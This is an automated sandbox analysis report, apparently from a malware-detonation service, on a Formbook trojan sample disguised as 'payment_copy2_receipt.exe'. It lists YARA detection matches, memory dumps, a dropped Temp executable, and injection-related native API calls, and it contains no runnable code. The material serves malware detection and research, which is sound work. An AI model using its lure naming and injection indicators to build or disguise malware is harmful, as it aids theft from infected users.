Source: Yara match File source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: fcvvthv.exe PID: 2828, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: msdt.exe PID: 5440, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: initial sample Static PE information: Filename: payment_copy2_receipt.exe
Source: payment_copy2_receipt.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: fcvvthv.exe PID: 2828, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: msdt.exe PID: 5440, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040324F
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Code function: 0_2_00406333 0_2_00406333
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe Code function: 0_2_00404936 0_2_00404936
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_0040B404 1_2_0040B404
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_0040C14D 1_2_0040C14D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_0040B900 1_2_0040B900
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_0040BD18 1_2_0040BD18
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_0040C582 1_2_0040C582
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_004167FD 1_2_004167FD
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_00B80227 1_2_00B80227
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 1_2_00B804D8 1_2_00B804D8
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_004012B0 3_2_004012B0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_0042127B 3_2_0042127B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00421AFB 3_2_00421AFB
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_004012A5 3_2_004012A5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00422BB0 3_2_00422BB0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_0040B462 3_2_0040B462
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_0040B467 3_2_0040B467
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00422438 3_2_00422438
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_004044C7 3_2_004044C7
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_004046E7 3_2_004046E7
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_0040FE97 3_2_0040FE97
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A820A0 3_2_00A820A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B220A8 3_2_00B220A8
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A6B090 3_2_00A6B090
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B228EC 3_2_00B228EC
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B2E824 3_2_00B2E824
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7A830 3_2_00A7A830
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B11002 3_2_00B11002
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A799BF 3_2_00A799BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A74120 3_2_00A74120
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A5F900 3_2_00A5F900
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B222AE 3_2_00B222AE
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B0FA2B 3_2_00B0FA2B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A8EBB0 3_2_00A8EBB0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B1DBD2 3_2_00B1DBD2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B103DA 3_2_00B103DA
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B22B28 3_2_00B22B28
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A7AB40 3_2_00A7AB40
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A6841F 3_2_00A6841F
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B1D466 3_2_00B1D466
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A82581 3_2_00A82581
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A6D5E0 3_2_00A6D5E0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B225DD 3_2_00B225DD
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A50D20 3_2_00A50D20
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B22D07 3_2_00B22D07
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B21D55 3_2_00B21D55
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B22EF7 3_2_00B22EF7
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A76E30 3_2_00A76E30
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B1D616 3_2_00B1D616
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B21FF1 3_2_00B21FF1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00B2DFCE 3_2_00B2DFCE
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: String function: 00A5B150 appears 72 times
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_0041E037 NtClose, 3_2_0041E037
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_0041E0E7 NtAllocateVirtualMemory, 3_2_0041E0E7
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_004012B0 EntryPoint,NtProtectVirtualMemory, 3_2_004012B0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_0041DF07 NtCreateFile, 3_2_0041DF07
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_0041DFB7 NtReadFile, 3_2_0041DFB7
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_004012A5 NtProtectVirtualMemory, 3_2_004012A5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_004014E9 NtProtectVirtualMemory, 3_2_004014E9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_0041DF01 NtCreateFile, 3_2_0041DF01
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A998F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00A998F0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00A99860
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99840 NtDelayExecution,LdrInitializeThunk, 3_2_00A99840
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A999A0 NtCreateSection,LdrInitializeThunk, 3_2_00A999A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00A99910
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99A20 NtResumeThread,LdrInitializeThunk, 3_2_00A99A20
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00A99A00
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99A50 NtCreateFile,LdrInitializeThunk, 3_2_00A99A50
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A995D0 NtClose,LdrInitializeThunk, 3_2_00A995D0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99540 NtReadFile,LdrInitializeThunk, 3_2_00A99540
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A996E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00A996E0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00A99660
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A997A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00A997A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe Code function: 3_2_00A99780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00A99780
